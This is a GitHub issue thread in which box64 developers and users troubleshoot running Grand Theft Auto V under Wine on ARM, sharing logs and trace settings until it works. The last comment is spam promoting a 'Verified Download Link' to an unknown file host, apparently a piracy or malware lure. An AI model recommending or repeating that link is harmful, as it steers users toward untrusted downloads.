### ISSUE TITLE
Grand Theft Auto V

### ISSUE THREAD

**Issue by Grima04** [ptitSeb/box64#53]
Grand Theft Auto V currently fails to boot, using Wine 6.0 upstream from PlayOnLinux with
`0140:err:module:open_builtin_file failed to load .so lib "/home/grima04/wine/lib64/wine/l3codeca.acm.so"`
I haven't seen any other errors though like unimplemented opcodes or missing functions.

**Comment by ptitSeb** [comment]
I guess `l3codeca.acm.so` libs libmepg123 or something like that. I'll check to wrap the libs and needed functions

**Comment by Grima04** [comment]
Thank you very much for your hard work. Now that the lib is wrapped, the error has disappeared. When launching GTA V now, still nothing seems to happen though, the game only seems to stick around as a ghost process (which I need to kill with sudo killall GTA5.exe in the terminal) but no error can be seen in the terminal output with the default logging level,
so I decided to upload a log made with BOX64_LOG=2. Hopefully the log contains something useful, even though it is quite large when uncompressed:
[log.zip](https://github.com/ptitSeb/box64/files/6811626/log.zip)

**Comment by ptitSeb** [comment]
Thanks, but this is not the log of GTA V, only the log of explorer.exe in desktop mode.
Wine launches several process, and the 1st one is explorer here.
You can capture GTA V if you launch directly, or you want need to use virtual desktop, use `BOX64_TRACE_FILE=$(pwd)/trace-%pid.txt` to generate 1 trace file per process, all in the current folder (named with the process id in pace of the `%pid`)

**Comment by Grima04** [comment]
Thank you very much for the detailed information to get the traces for every process. I have launched the game via the explorer, since launching executables directly didn't work for me with some other applications which launched fine using the virtual desktop and explorer.
I have now made two traces for GTA V, one with the default logging level and one with logging level 2. I have attached them below:
[gtav-traces.zip](https://github.com/ptitSeb/box64/files/6811887/gtav-traces.zip)

**Comment by ptitSeb** [comment]
So, I have analyse the log, but for now, I don't understand what's wrong. It seems to be stuck somehow, but no evidence why or were.
I need to run more (simple) stuff on wine64 to get box64 more stable first I guess.

**Comment by Grima04** [comment]
That is unfortunate but yes, it is very likely that it just gets stuck somewhere. The fact that the game seems to stick around as a ghost process seems to support that theory too. The game is probably just too complex to run it on box64 + Wine for now but I will give it a try again in a few weeks to see if something has changed/improved.

**Comment by Painadath** [comment]
> Grand Theft Auto V currently fails to boot, using Wine 6.0 upstream from PlayOnLinux with
> `0140:err:module:open_builtin_file failed to load .so lib "/home/grima04/wine/lib64/wine/l3codeca.acm.so"`
> I haven't seen any other errors though like unimplemented opcodes or missing functions.

@Grima04 how do use wine? Please tell me instructions

**Comment by LukeShortCloud** [comment]
GTA V appears to be working with newer builds of Box64. Performance in the video below is bad due to driver and hardware limitations of that device.

https://www.youtube.com/watch?v=mwDGdykYO2w

Closing as resolved.

**Comment by biket79400** [comment]
👇👇⤋ 𝐁𝐄𝐋𝐎𝐖 𝐃𝐈𝐑𝐄𝐂𝐓 𝐃𝐎𝐖𝐍𝐋𝐎𝐀𝐃 𝐋𝐈𝐍𝐊⤋⬇️👇👇

[Verified Download Link Here ✔✅](https://hubfiles.ink/)
